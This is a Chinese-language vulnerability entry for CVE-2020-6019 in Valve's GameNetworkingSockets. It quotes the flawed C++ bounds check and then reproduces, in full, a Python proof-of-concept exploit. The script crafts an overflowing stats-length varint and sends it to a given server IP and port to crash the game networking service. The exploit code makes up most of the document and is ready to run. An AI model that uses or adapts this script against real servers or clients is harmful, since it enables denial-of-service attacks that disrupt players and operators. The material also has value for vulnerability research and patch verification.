CVE-2020-6019 Valve Game Networking Sockets 安全漏洞
Valvesoftware ValveSoftware GameNetworkingSockets是美国维尔福(Valvesoftware)公司的一个用于游戏传递数据的传输层支持软件。 Valves Game Networking Sockets v1.2.0之前版本存在安全漏洞,该漏洞源于在函数CConnectionTransportUDPBase::Received Data()中不正确地处理内联统计消息,导致libprotobuf抛出异常并导致崩溃。
文件:steamnetworkingsockets\clientlib\steamnetworkingsockets_udp.cpp
函数:CConnectionTransportUDPBase::Received_Data()
连接协议支持作为传入消息头的一部分传输统计数据。
在准备解析protobuf编码的统计blob时,边界检查中有一个32位溢出:
pIn = DeserializeVarInt( pIn, pPktEnd, cbStatsMsgIn );
if ( pIn == NULL )
{
ReportBadUDPPacketFromConnectionPeer( "DataPacket", "Failed to varint decode size of stats blob" );
return;
}
// EI-DBG: Classic 32-bit overflow, and it turns out that CS:GO is 32bits (client & server).
// EI-DBG: Will lead to an error and raised exception in the ParseFromArray() method
if ( pIn + cbStatsMsgIn > pPktEnd )
{
ReportBadUDPPacketFromConnectionPeer( "DataPacket", "stats message size doesn't make sense. Stats message size %d, packet size %d", cbStatsMsgIn, cbPkt );
return;
}
if ( !msgStats.ParseFromArray( pIn, cbStatsMsgIn ) )
{
ReportBadUDPPacketFromConnectionPeer( "DataPacket", "protobuf failed to parse inline stats message" );
return;
}
CVE_2020_6019_PoC_32_bits.py:
#/usr/bin/python3
from elementals import Prompter
import logging
import sys
import socket
import struct
import steam_networking_sockets
####################
# Config Variables #
####################
VULNERABILITY_ID = "CVE-2020-6019 - 32 bits"
VULNERABILITY_DESC = "Exception raised when handling large 32-bit length field for incoming stats"
ENCRYPTION_TYPE = True
####################
# Global Variables #
####################
logger = None
##
# Trigger the vulnerability
##
def startExploit(socket_fd):
# build a protobuf blob to cause a 32-bit overflow
blob = bytes()
# Varint for the stats length
# Saw the protobuf raise the exception for it
wanted_length = 2 ** 32 - 0x4
while wanted_length > 0:
next_value = wanted_length >> 7
blob += struct.pack("B", (wanted_length & 0x7F) | (0x80 if next_value != 0 else 0x00))
wanted_length = next_value
# Unused length-delimited field to be "skipped" so to cause protobuf to complain about the negative size
blob += struct.pack("B", (5 << 3) | 2) # field number (5) is unused, and 2 is the wire_type for length-delimited
# Varint32 length for the "field"
wanted_length = 0x100
while wanted_length > 0:
next_value = wanted_length >> 7
blob += struct.pack("B", (wanted_length & 0x7F) | (0x80 if next_value != 0 else 0x00))
wanted_length = next_value
# we don't really need a message
msg = bytes()
steam_networking_sockets.connectionSend(socket_fd, msg, protobuf=blob)
##
# Prints the usage instructions
##
def printUsage(args):
print(f"Usage: {args[0]} <server_ip> <server port>")
print("Exiting")
exit(1)
##
# Main function (example)
##
def main(args):
global logger
# Check the arguments
if len(args) != 1 + 2:
print(f"Wrong amount of arguments, got {len(args) - 1}, expected 2.")
printUsage(args)
# parse the args
server_ip = args[1]
server_port = int(args[2])
# open the log
logger = Prompter(f"Exploit PoC - {VULNERABILITY_ID}", [("exploit_poc.log", "w", logging.DEBUG)], min_log_level=logging.DEBUG)
logger.info("Starting the exploit PoC:")
logger.addIndent()
logger.info(VULNERABILITY_ID)
logger.info(VULNERABILITY_DESC)
logger.removeIndent()
# create a Steam Sockets connection
socket_fd = steam_networking_sockets.createSteamConnection(server_ip, server_port, ENCRYPTION_TYPE, logger)
# start the attack
startExploit(socket_fd)
logger.info("Finished Successfully")
if __name__ == "__main__":
main(sys.argv)
ref:
https://cpr-zero.checkpoint.com/vulns/cprid-2161/
https://www.anquanke.com/vul/id/2235460
https://forum.ywhack.com/thread-114798-1-3.html